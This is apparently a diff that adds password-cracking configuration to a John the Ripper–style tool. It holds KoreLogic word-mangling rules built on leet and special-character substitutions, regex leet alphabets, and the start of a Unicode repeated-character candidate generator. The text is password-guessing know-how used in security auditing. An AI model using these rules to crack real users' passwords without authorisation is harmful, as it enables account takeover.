+-[:c] a0 /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# All "/L" rules (171 lines) were buggy
+-[:c] a0 /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# are these 100% redundant from above rules? !!!!
+-[:c] a0 /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
+# These are some popular triple/quad l33t rules
+-[:c] a0 /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+
+[List.Rules:ReplaceSpecial2Special]
+# Kore's rules were missing "*"
+# Kore's rules were missing ?[]{}`~
+# Now converted into just a SINGLE rule (well 2 since ? must use class syntax)
+#    The rules do add a Q to avoid no-op, but it is now 2 'working' rules
+#    NOTE, there were numerous rules which also had problems, which were fixed
+#    (in commented out rules), and are 'right' in the 2 new replacement rules.
+# Now thru some pre-processor jiu jitsu, this was reduced to a single rule line
+a0 /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~?]\p\r[:::::::::::::::::::::::::::::::?] \p\r[:::::::::::::::::::::::::::::::s]\p\r[sssssssssssssssssssssssssssssss?]\1[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+#these 2 are replaced by the equivalent above 1 rule.
+# /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~] s\0[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+# /?? s??[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~]
+#these are replaced by the equivalent above 2 rule lines.
+# /! s![@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+# /@ s@[!#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+#others replacing #$%^&*()-=_+\|;:'",./?><[]{}`~ cut out, and not shown.
+
+[List.Rules:ReplaceLetters]
+a0 /[a-z] s\0[a-z] Q
+-c a0 /[a-z] s\0[A-Z]
+
+####################################################################
+# This ruleset contains ALL of the above, for a total
+# of 7,074,074 rules after dupe removal
+[List.Rules:KoreLogic]
+.include [List.Rules:PrependNumNum]
+.include [List.Rules:PrependYears]
+.include [List.Rules:AppendYears]
+.include [List.Rules:PrependNumNumNum]
+.include [List.Rules:MonthsFullPreface]
+.include [List.Rules:Prepend4LetterMonths]
+.include [List.Rules:PrependSeason]
+.include [List.Rules:AppendSeason]
+.include [List.Rules:PrependHello]
+.include [List.Rules:AppendCurrentYearSpecial]
+.include [List.Rules:PrependSpecialSpecial]
+.include [List.Rules:Append2Letters]
+.include [List.Rules:AddJustNumbers]
+.include [List.Rules:DevProdTestUAT]
+.include [List.Rules:PrependAndAppendSpecial]
+.include [List.Rules:AppendJustNumbers]
+# This is split for better order:
+# First part of AppendNumbers_and_Specials_Simple
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendJustSpecials]
+.include [List.Rules:AddShortMonthsEverywhere]
+.include [List.Rules:Add2010Everywhere]
+.include [List.Rules:Add1234_Everywhere]
+.include [List.Rules:AppendMonthDay]
+.include [List.Rules:AppendMonthCurrentYear]
+.include [List.Rules:ReplaceNumbers2Special]
+.include [List.Rules:ReplaceNumbers]
+.include [List.Rules:ReplaceLettersCaps]
+.include [List.Rules:AddDotCom]
+.include [List.Rules:PrependJustSpecials]
+.include [List.Rules:Append1_AddSpecialEverywhere]
+.include [List.Rules:AppendNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendYears_AddSpecialEverywhere]
+.include [List.Rules:L33t]
+.include [List.Rules:ReplaceSpecial2Special]
+.include [List.Rules:ReplaceLetters]
+.include [List.Rules:AppendSpecialNumberNumber]
+.include [List.Rules:PrependNumNumAppendSpecial]
+.include [List.Rules:PrependNumNumSpecial]
+.include [List.Rules:Append2NumSpecial]
+.include [List.Rules:PrependDaysWeek]
+# Second part of AppendNumbers_and_Specials_Simple
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+.include [List.Rules:PrependSpecialSpecialAppendNumber]
+.include [List.Rules:Append4Num]
+.include [List.Rules:PrependNumNumNumNum]
+.include [List.Rules:Prepend2NumbersAppend2Numbers]
+.include [List.Rules:PrependCAPCAPAppendSpecial]
+.include [List.Rules:AppendSpecialLowerLower]
+# Last part of AppendNumbers_and_Specials_Simple
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendSpecial3num]
+.include [List.Rules:AppendSpecialNumberNumberNumber]
+.include [List.Rules:Append3NumSpecial]
+.include [List.Rules:PrependNumNum_AppendNumSpecial]
+.include [List.Rules:AppendJustSpecials3Times]
+.include [List.Rules:AppendCap-Num_or_Special-Twice]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+.include [List.Rules:Append5Num]
+.include [List.Rules:AppendSpecial4num]
+.include [List.Rules:Prepend4NumAppendSpecial]
+.include [List.Rules:Append4NumSpecial]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+.include [List.Rules:Append6Num]
@@ -0,0 +1,375 @@
+# regex_alphabets.conf
+#
+#  This is the multiple alphabest usable by rexgen function.
+
+# this is the 'default'
+[List.Rexgen.Alpha]
+
+# can also use -i mode rexgen (TBD)
+[List.Rexgen.Alpha:cased]
+a=[aA]
+b=[bB]
+c=[cC]
+d=[dD]
+e=[eE]
+f=[fF]
+g=[gG]
+h=[hH]
+i=[iI]
+j=[jJ]
+k=[kK]
+l=[lL]
+m=[mM]
+n=[nN]
+o=[oO]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS]
+t=[tT]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# simple 1337 mode.  ONLY leet's lower case letters, and smallish alphabet. But VERY fast.
+[List.Rexgen.Alpha:leet]
+a=[a4@]
+b=[b8]
+e=[e3]
+g=[g9]
+i=[i!]
+l=[l17]
+o=[o0]
+s=[s$5]
+t=[t+7]
+
+# simple 1337 mode with mixed case
+[List.Rexgen.Alpha:leet+c]
+a=[aA4@]
+b=[bB8]
+c=[cC]
+d=[dD]
+e=[eE3]
+f=[fF]
+g=[gG9]
+h=[hH]
+i=[iI!]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# much stronger 1337 mode.  Does much larger alphabet.  Includes a couple multiple
+# character replacement values: f -> ph and f -> |=  Also does upper case
+# note contains ALL values from Rexgen.Alpha:leet
+[List.Rexgen.Alpha:leet2]
+a=[a4@]
+b=[b8]
+c=[c\(<k]
+e=[e3]
+f=(f|ph|\|=)
+g=[g9]
+i=[i1!\|]
+l=[l1]
+o=[o0]
+s=[s$5]
+t=[t+7]
+A=[A4@]
+B=[B8]
+C=[C\(<k]
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G9]
+I=[I1!\|]
+L=[L1]
+O=[O0]
+S=[S$5]
+T=[T+7]
+
+# stronger elete, with mixed case.
+[List.Rexgen.Alpha:leet2_case]
+a=[aA4@]
+b=[bB8]
+c=[cC\(]
+d=[dD]
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG9]
+h=[hH]
+i=[iI1!\|]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA4@]
+B=[bB8]
+C=[cC\(]
+D=[dD]
+E=[eE3]
+F=(f|F|Ph|ph|PH|\|=)
+G=[gG9]
+H=[hH]
+I=[iI1!\|]
+J=[jJ]
+K=[kK]
+L=[lL1]
+M=[mM]
+N=[nN]
+O=[oO0]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS$5]
+T=[tT+7]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# Very strong elete.  MANY multi char eletes, AND some other more obsure ones.
+# a LOT of stuff here, BUT runs much much slower, since there are many more optional
+# values to try.
+# note contains ALL values from Rexgen.Alpha:leet2
+[List.Rexgen.Alpha:leet3]
+a=(a|/-\\|4|@)
+b=(b|\|3|\|o|8)
+c=[c\(<KS]
+d=(d|\|\)|o\||\|>|<\|)
+e=[e3]
+f=(f|ph|\|=)
+g=[g\(69]
+h=(h|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|1|!|\||\]\[)
+j=(j|_\|)
+k=(k|\|<|/<|\\<|\|\{)
+l=(l|1|\||\|_)
+m=(m|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|0|\(\)|\[\]|\{\})
+p=(p|\|2|\|D)
+q=(q|\(,\)|kw)
+r=(r|\|2|\|Z|\|?)
+s=[s$5]
+t=(t|+|'\]\['|7)
+u=(u|\|_\|)
+v=(v|\|/|\\\||\\/|/)
+w=(w|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|><|\}\{)
+y=(y|'/|`/|j)
+z=(z|2|\(\\\))
+A=(A|/-\\|4|@)
+B=(B|\|3|\|o|8)
+C=[C\(<KS]
+D=(D|\|\)|o\||\|>|<\|)
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G\(69]
+H=(H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(I|1|!|\||\]\[)
+J=(J|_\|)
+K=(K|\|<|/<|\\<|\|\{)
+L=(L|1|\||\|_)
+M=(M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(O|0|\(\)|\[\]|\{\})
+P=(P|\|2|\|D)
+Q=(Q|\(,\)|kw)
+R=(R|\|2|\|Z|\|?)
+S=[S$5]
+T=(T|+|'\]\['|7)
+U=(U|\|_\|)
+v=(V|\|/|\\\||\\/|/)
+W=(W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(X|><|\}\{)
+Y=(Y|'/|`/|j)
+Z=(Z|2|\(\\\))
+
+[List.Rexgen.Alpha:leet3_case]
+a=(a|A|/-\\|4|@)
+b=(b|B|\|3|\|o|8)
+c=[cC\(<KS]
+d=(d|D|\|\)|o\||\|>|<\|)
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG\(69]
+h=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+i=(i|I|1|!|\||\]\[)
+j=(j|J|_\|)
+k=(k|K|\|<|/<|\\<|\|\{)
+l=(l|L|1|\||\|_)
+m=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+n=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+o=(o|O|0|\(\)|\[\]|\{\})
+p=(p|P|\|2|\|D)
+q=(q|Q|\(,\)|kw)
+r=(r|R|\|2|\|Z|\|?)
+s=[sS$5]
+t=(t|T|+|'\]\['|7)
+u=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+w=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+x=(x|X|><|\}\{)
+y=(y|Y|'/|`/|j)
+z=(z|Z|2|\(\\\))
+A=(a|A|/-\\|4|@)
+B=(b|B|\|3|\|o|8)
+C=[cC\(<KS]
+D=(d|D|\|\)|o\||\|>|<\|)
+E=[eE3]
+F=(f|F|PH|Ph|ph|\|=)
+G=[gG\(69]
+H=(h|H|\|\-\||\]\-\[|\}-\{|\(-\)|\)-\(|\}\{|#)
+I=(i|I|1|!|\||\]\[)
+J=(j|J|_\|)
+K=(k|K|\|<|/<|\\<|\|\{)
+L=(l|L|1|\||\|_)
+M=(m|M|\|\\/\||/\\/\\|\|'\|'\||\(\\/\)|/\\\\|/\|\\|/v\\)
+N=(n|N|\|\\\||/\\/|\|\\\\\||/\|/)
+O=(o|O|0|\(\)|\[\]|\{\})
+P=(p|P|\|2|\|D)
+Q=(q|Q|\(,\)|kw)
+R=(r|R|\|2|\|Z|\|?)
+S=[sS$5]
+T=(t|T|+|'\]\['|7)
+U=(u|U|\|_\|)
+v=(v|V|\|/|\\\||\\/|/)
+W=(w|W|\\/\\/|\\\|\\\||\|/\|/|\\\|/|\\^/|//)
+X=(x|X|><|\}\{)
+Y=(y|Y|'/|`/|j)
+Z=(z|Z|2|\(\\\))
+
+[List.Rexgen.Alpha:ascii2nonascii]
+A=[ÀÁÂÃÄÅÆĀĂĄǍǞǠǺȀȂȦȺA]
+B=[ƁƂɃʙB]
+C=[ÇĆĈĊČƇȻC]
+D=[ÐĎĐƉƊƋǱǲD]
+E=[ÈÉÊËĒĔĖĘĚƎƏƐȄȆȨɆE]
+F=[ƑF]
+G=[ĜĞĠĢƓǤǦǴɢG]
+H=[ĤĦǶȞʜH]
+I=[ÌÍÎÏĨĪĬĮİƗǏȈȊɪI]
+J=[ĴƖɈJ]
+K=[ĶĸƘǨK]
+L=[£ĹĻĽĿŁȽʟL]
+M=[ƜM]
+N=[ÑŃŅŇŊƝǸȠɴN]
+O=[ÒÓÔÕÖØŌŎŐŒƆƟƠǑǪǬǾȌȎȪȬȮȰƢO]
+P=[ƤP]
+Q=[ɊQ]
+R=[®ŔŖŘƦȐȒɌʀʁʶR]
+S=[ŚŜŞŠƧȘS]
+T=[ŢŤƬƮȚȾT]
+U=[ÙÚÛÜŨŪŬŮŰŲƯǓǕǗǙǛȔȖɄU]
+V=[ɅV]
+W=[ŴW]
+Y=[¥ÝŶŸƳȲɎʏY]
+Z=[ŹŻŽƵȤZ]
+a=[àáâãäåæāăąǎǟǡǻȁȃȧɐɑɒa]
+b=[ƀƃɓb]
+c=[¢©çćĉċčƈȼɕc]
+d=[ðďđƌƍȡɖɗǳd]
+e=[èéêëēĕėęěǝȅȇȩɇɘəɚɛɜɝɞe]
+f=[ƒf]
+g=[ĝğġģǥǧǵɠɡg]
+h=[ħȟɥɦʮʯʰʱĥh]
+i=[ìíîïĩīĭįıǐȉȋɨi]
+j=[ĵǰȷɉɟʄʝʲj]
+k=[ķƙǩʞ]
+l=[ĺļľŀłƚƛȴɫɬɭl]
+m=[µɯɰɱm]
+n=[ñńņňŉŋƞǹȵɲɳn]
+o=[òóôõöøōŏőœơǒǫǭǿȍȏȫȭȯȱɵƣȣo]
+p=[ƥp]
+q=[ɋʠq]
+r=[ŕŗřȑȓɍɹɺɻɼɽɾɿʳʴʵr]
+s=[śŝşšſƨșȿʂs]
+t=[ţťŦŧƫƭțȶʇʈt]
+u=[ùúûüũūŭůűųưǔǖǘǚǜȕȗʉu]
+v=[ʌv]
+w=[ŵʍʷw]
+x=[×x]
+y=[ýÿŷƴȳɏʎʸy]
+z=[źżžƶȥɀʐʑz]
@@ -0,0 +1,1401 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Unicode (version 11) BMP version
+#
+# Number of candidates = 55,292 x max-length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Repeats16]
+int minlength, maxlength, maxc, length, c;
+int charset[0x10000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
